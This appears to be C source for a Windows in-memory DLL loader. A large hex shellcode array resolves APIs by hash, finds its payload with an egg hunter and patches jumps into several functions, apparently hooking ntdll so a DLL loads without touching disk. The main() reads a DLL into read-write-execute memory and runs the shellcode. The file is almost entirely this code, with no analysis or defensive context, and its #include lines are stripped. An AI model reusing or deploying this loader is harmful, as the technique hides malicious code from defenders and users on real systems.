#include #include #include unsigned char shellcode[] = "\x55\x8b\xec\x81\xec\xa0\x01\x00\x00\xa1\x2c\xd0\x40\x00\x33\xc5\x89\x45\xfc\x53\x56" "\x57\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x83\xeb\x1f\x89\x9d\x68\xff\xff\xff" "\x89\xbd\x60\xfe\xff\xff\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b" "\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c" "\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b" "\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0" "\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd" "\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3" "\xe8\x8b\xff\xff\xff\x8b\xd8\x68\x8e\x4e\x0e\xec\x53\xe8\xa0\xff\xff\xff\x83\xc4" "\x08\x89\x45\xbc\x68\xaa\xfc\x0d\x7c\x53\xe8\x8f\xff\xff\xff\x83\xc4\x08\x89\x45" "\xc0\x68\x7e\xd8\xe2\x73\x53\xe8\x7e\xff\xff\xff\x83\xc4\x08\x89\x45\xc4\x68\x54" "\xca\xaf\x91\x53\xe8\x6d\xff\xff\xff\x83\xc4\x08\x89\x45\xc8\x68\xac\x33\x06\x03" "\x53\xe8\x5c\xff\xff\xff\x83\xc4\x08\x89\x45\xcc\x68\xaa\xc8\xc8\xa3\x53\xe8\x4b" "\xff\xff\xff\x83\xc4\x08\x89\x45\xd0\x68\x1b\xc6\x46\x79\x53\xe8\x3a\xff\xff\xff" "\x83\xc4\x08\x89\x45\xd4\x68\x80\x09\x12\x53\x53\xe8\x29\xff\xff\xff\x83\xc4\x08" "\x89\x45\xd8\x68\xa1\x6a\x3d\xd8\x53\xe8\x18\xff\xff\xff\x83\xc4\x08\x89\x45\xdc" "\x33\xc0\xb0\x6c\x50\x68\x6e\x74\x64\x6c\x54\xff\x55\xbc\x8b\xd8\x68\x95\xdd\xb5" "\x92\x53\xe8\xf7\xfe\xff\xff\x83\xc4\x08\x89\x45\xa8\x68\x90\x78\x4a\x49\x53\xe8" "\xe6\xfe\xff\xff\x83\xc4\x08\x89\x45\xac\x68\xb8\x74\x29\x85\x53\xe8\xd5\xfe\xff" "\xff\x83\xc4\x08\x89\x45\xb0\x68\xcb\x9b\xb2\x5b\x53\xe8\xc4\xfe\xff\xff\x83\xc4" "\x08\x89\x45\xb4\x68\x94\x9b\x15\xd5\x53\xe8\xb3\xfe\xff\xff\x83\xc4\x08\x89\x45" "\xb8\x8d\x85\x60\xfe\xff\xff\x50\xe8\xae\x07\x00\x00\x83\xc4\x04\x5f\x5e\x5b\x8b" "\x4d\xfc\x33\xcd\xe8\x85\x0a\x00\x00\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc" "\xcc\xcc\xcc\xff\xff\xff\xff\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55" "\x8b\xec\xe8\x00\x00\x00\x00\x59\x83\xe9\x08\xb8\xe0\x11\x40\x00\x2d\xd0\x11\x40" "\x00\x2b\xc8\x8b\x01\x5d\xc3\xcc\xcc\xcc\xcc\x55\x8b\xec\x83\xec\x08\xc7\x45\xfc" "\x00\x00\x00\x00\xeb\x09\x8b\x45\xfc\x83\xc0\x01\x89\x45\xfc\x8b\x4d\x0c\x0f\xb7" "\x11\x39\x55\xfc\x7d\x56\xc7\x45\xf8\x00\x00\x00\x00\xeb\x09\x8b\x45\xf8\x83\xc0" "\x01\x89\x45\xf8\x8b\x4d\x08\x8b\x55\xf8\x3b\x91\x04\x01\x00\x00\x7d\x22\x8b\x45" "\xfc\x03\x45\xf8\x8b\x4d\x0c\x8b\x51\x04\x0f\xb7\x04\x42\x8b\x4d\x08\x03\x4d\xf8" "\x0f\xbe\x51\x04\x3b\xc2\x74\x02\xeb\x02\xeb\xc7\x8b\x45\x08\x8b\x4d\xf8\x3b\x88" "\x04\x01\x00\x00\x75\x04\x33\xc0\xeb\x07\xeb\x96\xb8\x01\x00\x00\x00\x8b\xe5\x5d" "\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x51\xe8" "\x47\xff\xff\xff\x89\x45\xfc\x8b\x45\x10\x8b\x48\x08\x51\x8b\x55\xfc\x52\xe8\x54" "\xff\xff\xff\x83\xc4\x08\x85\xc0\x75\x12\x8b\x45\x08\x8b\x4d\xfc\x8b\x91\x10\x01" "\x00\x00\x89\x10\x33\xc0\xeb\x17\x8b\x45\x10\x50\x8b\x4d\x0c\x51\x8b\x55\x08\x52" "\x8b\x45\xfc\x8b\x88\x80\x01\x00\x00\xff\xd1\x8b\xe5\x5d\xc2\x0c\x00\xcc\xcc\xcc" "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x51\xe8\xe7\xfe\xff\xff" "\x89\x45\xfc\x8b\x45\x08\x8b\x48\x08\x51\x8b\x55\xfc\x52\xe8\xf4\xfe\xff\xff\x83" "\xc4\x08\x85\xc0\x75\x5d\x8b\x45\x0c\xc7\x00\xe0\x5c\x27\x7e\x8b\x4d\x0c\xc7\x41" "\x04\xfa\x22\xc4\x01\x8b\x55\x0c\xc7\x42\x08\xe0\x5c\x27\x8e\x8b\x45\x0c\xc7\x40" "\x0c\xfa\x22\xc4\x01\x8b\x4d\x0c\xc7\x41\x10\xe0\x5c\x27\x7e\x8b\x55\x0c\xc7\x42" "\x14\xfa\x22\xc4\x01\x8b\x45\x0c\xc7\x40\x18\xe0\x5c\x27\x7e\x8b\x4d\x0c\xc7\x41" "\x1c\xfa\x22\xc4\x01\x8b\x55\x0c\xc7\x42\x20\x80\x00\x00\x00\x33\xc0\xeb\x13\x8b" "\x45\x0c\x50\x8b\x4d\x08\x51\x8b\x55\xfc\x8b\x82\x84\x01\x00\x00\xff\xd0\x8b\xe5" "\x5d\xc2\x08\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x51\xe8\x47\xfe\xff\xff" "\x89\x45\xfc\x8b\x45\x10\x8b\x48\x08\x51\x8b\x55\xfc\x52\xe8\x54\xfe\xff\xff\x83" "\xc4\x08\x85\xc0\x75\x10\x8b\x45\x08\x8b\x4d\xfc\x8b\x91\x10\x01\x00\x00\x89\x10" "\xeb\x23\x8b\x45\x1c\x50\x8b\x4d\x18\x51\x8b\x55\x14\x52\x8b\x45\x10\x50\x8b\x4d" "\x0c\x51\x8b\x55\x08\x52\x8b\x45\xfc\x8b\x88\x88\x01\x00\x00\xff\xd1\x8b\xe5\x5d" "\xc2\x18\x00\xcc\xcc\xcc\xcc\x55\x8b\xec\x51\xe8\xe7\xfd\xff\xff\x89\x45\xfc\x8b" "\x45\xfc\x8b\x4d\x20\x3b\x88\x10\x01\x00\x00\x75\x12\x8b\x55\x08\x8b\x45\xfc\x8b" "\x88\x10\x01\x00\x00\x89\x0a\x33\xc0\xeb\x27\x8b\x55\x20\x52\x8b\x45\x1c\x50\x8b" "\x4d\x18\x51\x8b\x55\x14\x52\x8b\x45\x10\x50\x8b\x4d\x0c\x51\x8b\x55\x08\x52\x8b" "\x45\xfc\x8b\x88\x8c\x01\x00\x00\xff\xd1\x8b\xe5\x5d\xc2\x1c\x00\xcc\xcc\xcc\xcc" "\xcc\xcc\xcc\x55\x8b\xec\x51\xe8\x87\xfd\xff\xff\x89\x45\xfc\x8b\x45\xfc\x8b\x4d" "\x08\x3b\x88\x10\x01\x00\x00\x75\x12\x8b\x55\x10\x8b\x45\xfc\x8b\x88\x10\x01\x00" "\x00\x89\x0a\x33\xc0\xeb\x33\x8b\x55\x2c\x52\x8b\x45\x28\x50\x8b\x4d\x24\x51\x8b" "\x55\x20\x52\x8b\x45\x1c\x50\x8b\x4d\x18\x51\x8b\x55\x14\x52\x8b\x45\x10\x50\x8b" "\x4d\x0c\x51\x8b\x55\x08\x52\x8b\x45\xfc\x8b\x88\x90\x01\x00\x00\xff\xd1\x8b\xe5" "\x5d\xc2\x28\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x83\xec" "\x28\xc7\x45\xd8\x05\x00\x00\x00\x8d\x45\xdc\x50\x8b\x4d\xd8\x51\x8b\x55\x0c\x52" "\x8b\x45\x10\x50\x6a\xff\x8b\x4d\x08\x8b\x91\x7c\x01\x00\x00\xff\xd2\x8b\x45\x10" "\x03\x45\xd8\xc6\x00\xe9\x8b\x4d\x10\x83\xc1\x05\x8b\x55\x0c\x2b\xd1\x8b\x45\x10" "\x03\x45\xd8\x89\x50\x01\x6a\x1c\x8d\x4d\xe4\x51\x8b\x55\x0c\x52\x8b\x45\x08\x8b" "\x88\x70\x01\x00\x00\xff\xd1\x8d\x55\xf8\x52\x6a\x40\x8b\x45\xf0\x50\x8b\x4d\xe4" "\x51\x8b\x55\x08\x8b\x82\x74\x01\x00\x00\xff\xd0\x8b\x4d\x0c\xc6\x01\xe9\x8b\x55" "\x0c\x83\xc2\x05\x8b\x45\x14\x2b\xc2\x8b\x4d\x0c\x89\x41\x01\x8d\x55\xe0\x52\x8b" "\x45\xf8\x50\x8b\x4d\xf0\x51\x8b\x55\xe4\x52\x8b\x45\x08\x8b\x88\x74\x01\x00\x00" "\xff\xd1\x8b\x55\xf0\x52\x8b\x45\xe4\x50\x6a\xff\x8b\x4d\x08\x8b\x91\x78\x01\x00" "\x00\xff\xd2\x8b\xe5\x5d\xc3\x55\x8b\xec\xb8\x50\x14\x40\x00\x2d\x00\x10\x40\x00" "\x8b\x4d\x08\x03\x81\x08\x01\x00\x00\x50\x8b\x55\x08\x81\xc2\x3c\x01\x00\x00\x52" "\x8b\x45\x08\x8b\x88\x58\x01\x00\x00\x51\x8b\x55\x08\x52\xe8\x0c\xff\xff\xff\x83" "\xc4\x10\x8b\x45\x08\x05\x3c\x01\x00\x00\x8b\x4d\x08\x89\x81\x90\x01\x00\x00\xba" "\xf0\x12\x40\x00\x81\xea\x00\x10\x40\x00\x8b\x45\x08\x03\x90\x08\x01\x00\x00\x52" "\x8b\x4d\x08\x81\xc1\x1e\x01\x00\x00\x51\x8b\x55\x08\x8b\x82\x4c\x01\x00\x00\x50" "\x8b\x4d\x08\x51\xe8\xc6\xfe\xff\xff\x83\xc4\x10\x8b\x55\x08\x81\xc2\x1e\x01\x00" "\x00\x8b\x45\x08\x89\x90\x84\x01\x00\x00\xb9\x90\x13\x40\x00\x81\xe9\x00\x10\x40" "\x00\x8b\x55\x08\x03\x8a\x08\x01\x00\x00\x51\x8b\x45\x08\x05\x28\x01\x00\x00\x50" "\x8b\x4d\x08\x8b\x91\x50\x01\x00\x00\x52\x8b\x45\x08\x50\xe8\x80\xfe\xff\xff\x83" "\xc4\x10\x8b\x4d\x08\x81\xc1\x28\x01\x00\x00\x8b\x55\x08\x89\x8a\x88\x01\x00\x00" "\xb8\xf0\x13\x40\x00\x2d\x00\x10\x40\x00\x8b\x4d\x08\x03\x81\x08\x01\x00\x00\x50" "\x8b\x55\x08\x81\xc2\x32\x01\x00\x00\x52\x8b\x45\x08\x8b\x88\x54\x01\x00\x00\x51" "\x8b\x55\x08\x52\xe8\x3a\xfe\xff\xff\x83\xc4\x10\x8b\x45\x08\x05\x32\x01\x00\x00" "\x8b\x4d\x08\x89\x81\x8c\x01\x00\x00\xba\x90\x12\x40\x00\x81\xea\x00\x10\x40\x00" "\x8b\x45\x08\x03\x90\x08\x01\x00\x00\x52\x8b\x4d\x08\x81\xc1\x14\x01\x00\x00\x51" "\x8b\x55\x08\x8b\x82\x48\x01\x00\x00\x50\x8b\x4d\x08\x51\xe8\xf4\xfd\xff\xff\x83" "\xc4\x10\x8b\x55\x08\x81\xc2\x14\x01\x00\x00\x8b\x45\x08\x89\x90\x80\x01\x00\x00" "\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x83\xec" "\x28\xc7\x45\xd8\x05\x00\x00\x00\x6a\x1c\x8d\x45\xe4\x50\x8b\x4d\x0c\x51\x8b\x55" "\x08\x8b\x82\x70\x01\x00\x00\xff\xd0\x8d\x4d\xf8\x51\x6a\x40\x8b\x55\xf0\x52\x8b" "\x45\xe4\x50\x8b\x4d\x08\x8b\x91\x74\x01\x00\x00\xff\xd2\x8d\x45\xdc\x50\x8b\x4d" "\xd8\x51\x8b\x55\x10\x52\x8b\x45\x0c\x50\x6a\xff\x8b\x4d\x08\x8b\x91\x7c\x01\x00" "\x00\xff\xd2\x8d\x45\xe0\x50\x8b\x4d\xf8\x51\x8b\x55\xf0\x52\x8b\x45\xe4\x50\x8b" "\x4d\x08\x8b\x91\x74\x01\x00\x00\xff\xd2\x8b\x45\xf0\x50\x8b\x4d\xe4\x51\x6a\xff" "\x8b\x55\x08\x8b\x82\x78\x01\x00\x00\xff\xd0\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\x55" "\x8b\xec\x8b\x45\x08\x05\x3c\x01\x00\x00\x50\x8b\x4d\x08\x8b\x91\x58\x01\x00\x00" "\x52\x8b\x45\x08\x50\xe8\x51\xff\xff\xff\x83\xc4\x0c\x8b\x4d\x08\x81\xc1\x1e\x01" "\x00\x00\x51\x8b\x55\x08\x8b\x82\x4c\x01\x00\x00\x50\x8b\x4d\x08\x51\xe8\x31\xff" "\xff\xff\x83\xc4\x0c\x8b\x55\x08\x81\xc2\x28\x01\x00\x00\x52\x8b\x45\x08\x8b\x88" "\x50\x01\x00\x00\x51\x8b\x55\x08\x52\xe8\x11\xff\xff\xff\x83\xc4\x0c\x8b\x45\x08" "\x05\x32\x01\x00\x00\x50\x8b\x4d\x08\x8b\x91\x54\x01\x00\x00\x52\x8b\x45\x08\x50" "\xe8\xf2\xfe\xff\xff\x83\xc4\x0c\x8b\x4d\x08\x81\xc1\x14\x01\x00\x00\x51\x8b\x55" "\x08\x8b\x82\x48\x01\x00\x00\x50\x8b\x4d\x08\x51\xe8\xd2\xfe\xff\xff\x83\xc4\x0c" "\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x83\xec" "\x10\x8b\x45\x08\x8b\x88\x0c\x01\x00\x00\x89\x4d\xf0\x8b\x55\x08\x8b\x82\x0c\x01" "\x00\x00\x8b\x4d\xf0\x03\x41\x3c\x89\x45\xfc\x6a\x40\x68\x00\x30\x00\x00\x8b\x55" "\xfc\x8b\x42\x50\x50\x8b\x4d\xfc\x8b\x51\x34\x52\x8b\x45\x08\x8b\x88\x68\x01\x00" "\x00\xff\xd1\x8b\x55\x08\x89\x82\x10\x01\x00\x00\x8b\x45\x08\x83\xb8\x10\x01\x00" "\x00\x00\x75\x24\x6a\x40\x68\x00\x30\x00\x00\x8b\x4d\xfc\x8b\x51\x50\x52\x6a\x00" "\x8b\x45\x08\x8b\x88\x68\x01\x00\x00\xff\xd1\x8b\x55\x08\x89\x82\x10\x01\x00\x00" "\x6a\x00\x8b\x45\xfc\x8b\x48\x54\x51\x8b\x55\x08\x8b\x82\x0c\x01\x00\x00\x50\x8b" "\x4d\x08\x8b\x91\x10\x01\x00\x00\x52\x6a\xff\x8b\x45\x08\x8b\x88\x7c\x01\x00\x00" "\xff\xd1\x8b\x55\xfc\x0f\xb7\x42\x14\x8b\x4d\xfc\x8d\x54\x01\x18\x89\x55\xf4\xc7" "\x45\xf8\x00\x00\x00\x00\xeb\x09\x8b\x45\xf8\x83\xc0\x01\x89\x45\xf8\x8b\x4d\xfc" "\x0f\xb7\x51\x06\x39\x55\xf8\x7d\x4d\x6a\x00\x8b\x45\xf8\x6b\xc0\x28\x8b\x4d\xf4" "\x8b\x54\x01\x10\x52\x8b\x45\xf8\x6b\xc0\x28\x8b\x4d\x08\x8b\x91\x0c\x01\x00\x00" "\x8b\x4d\xf4\x03\x54\x01\x14\x52\x8b\x55\xf8\x6b\xd2\x28\x8b\x45\x08\x8b\x88\x10" "\x01\x00\x00\x8b\x45\xf4\x03\x4c\x10\x0c\x51\x6a\xff\x8b\x4d\x08\x8b\x91\x7c\x01" "\x00\x00\xff\xd2\xeb\x9e\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55" "\x8b\xec\x83\xec\x34\xa1\x2c\xd0\x40\x00\x33\xc5\x89\x45\xe0\x56\x57\xc6\x45\xd4" "\x49\xc6\x45\xd5\x6e\xc6\x45\xd6\x69\xc6\x45\xd7\x74\xc6\x45\xd8\x00\x66\x81\xca" "\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x90\x07\x33\x31\x8b" "\xfa\xaf\x75\xea\xaf\x75\xe7\x8b\x07\x89\x45\xec\x8d\x47\x04\x89\x45\xe8\x6a\x04" "\x68\x00\x10\x00\x00\x8b\x45\xec\x50\x6a\x00\x8b\x4d\x08\x8b\x91\x68\x01\x00\x00" "\xff\xd2\x8b\x4d\x08\x89\x81\x0c\x01\x00\x00\x8b\x55\x08\x83\xba\x0c\x01\x00\x00" "\x00\x75\x0d\x6a\x01\x8b\x45\x08\x8b\x88\x64\x01\x00\x00\xff\xd1\x8b\x55\x08\x8b" "\x82\x0c\x01\x00\x00\x89\x45\xcc\x8b\x4d\xec\x8b\x7d\xcc\x8b\x75\xe8\xf3\xa4\xc7" "\x45\xf4\x00\x00\x00\x00\xeb\x09\x8b\x4d\xf4\x83\xc1\x01\x89\x4d\xf4\x8b\x55\x08" "\x8b\x82\x0c\x01\x00\x00\x8b\x4d\xf4\x0f\xbe\x14\x08\x85\xd2\x74\x1a\x8b\x45\x08" "\x8b\x88\x0c\x01\x00\x00\x8b\x55\x08\x03\x55\xf4\x8b\x45\xf4\x8a\x0c\x01\x88\x4a" "\x04\xeb\xc9\x8b\x55\x08\x03\x55\xf4\xc6\x42\x04\x00\x8b\x45\x08\x8b\x4d\xf4\x89" "\x88\x04\x01\x00\x00\x8b\x55\x08\x8b\x82\x0c\x01\x00\x00\x8b\x4d\xf4\x8d\x54\x01" "\x01\x8b\x45\x08\x89\x90\x0c\x01\x00\x00\x8b\x4d\x08\x51\xe8\xb8\xfd\xff\xff\x83" "\xc4\x04\xba\xd0\x11\x40\x00\x81\xea\x00\x10\x40\x00\x8b\x45\x08\x8b\x88\x08\x01" "\x00\x00\x8b\x45\x08\x89\x04\x0a\x8b\x4d\x08\x51\xe8\xe2\xfa\xff\xff\x83\xc4\x04" "\x8b\x55\x08\x83\xc2\x04\x52\x8b\x45\x08\x8b\x88\x5c\x01\x00\x00\xff\xd1\x89\x45" "\xf0\x83\x7d\xf0\x00\x75\x0d\x6a\x01\x8b\x55\x08\x8b\x82\x64\x01\x00\x00\xff\xd0" "\x8b\x4d\x08\x51\xe8\xae\xfc\xff\xff\x83\xc4\x04\x8d\x55\xd4\x52\x8b\x45\xf0\x50" "\x8b\x4d\x08\x8b\x91\x60\x01\x00\x00\xff\xd2\x89\x45\xfc\x83\x7d\xfc\x00\x74\x0c" "\x8b\x45\x08\x8b\x08\x51\xff\x55\xfc\x83\xc4\x04\x68\x00\x80\x00\x00\x6a\x00\x8b" "\x55\x08\x8b\x45\x08\x8b\x8a\x0c\x01\x00\x00\x2b\x88\x04\x01\x00\x00\x83\xe9\x01" "\x51\x8b\x55\x08\x8b\x82\x6c\x01\x00\x00\xff\xd0\x6a\x00\x8b\x4d\x08\x8b\x91\x64" "\x01\x00\x00\xff\xd2\xc7\x45\x08\x00\x00\x00\x00\x33\xc0\x5f\x5e\x8b\x4d\xe0\x33" "\xcd\xe8\x00\x01\x00\x00\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\xcc"; typedef BOOL (WINAPI *runShellcode)(); int main(int argc, char **argv){ char dllName[] = "symtex.dll"; HANDLE dllHandle, mapHandle; ULONG safeDllBase; DWORD dllSize; ULONG byteCounter = 0; DWORD bytesRead = 0; runShellcode dllLoad = shellcode; if((dllHandle=CreateFile("this_dll.dll", GENERIC_READ, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE){ printf("[*] createfile failed\n"); return 1; } if((dllSize = GetFileSize(dllHandle, NULL)) == INVALID_FILE_SIZE){ printf("[*] getfilesize failed\n"); CloseHandle(dllHandle); return 1; } if(!(safeDllBase = VirtualAlloc(NULL, dllSize+12+strlen(dllName)+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE))){ printf("[*] virtualalloc failed\n"); CloseHandle(dllHandle); return 1; } *(LPDWORD)safeDllBase = 0x31330790; *(LPDWORD)(safeDllBase+4) = 0x31330790; *(LPDWORD)(safeDllBase+8) = dllSize; strcpy((char *)(safeDllBase+12), dllName); if(!ReadFile(dllHandle, (LPVOID)(safeDllBase+12+strlen(dllName)+1), dllSize, &bytesRead, NULL)){ printf("[*] readfile failed\n"); CloseHandle(dllHandle); return 1; } CloseHandle(dllHandle); dllLoad(); return 0; }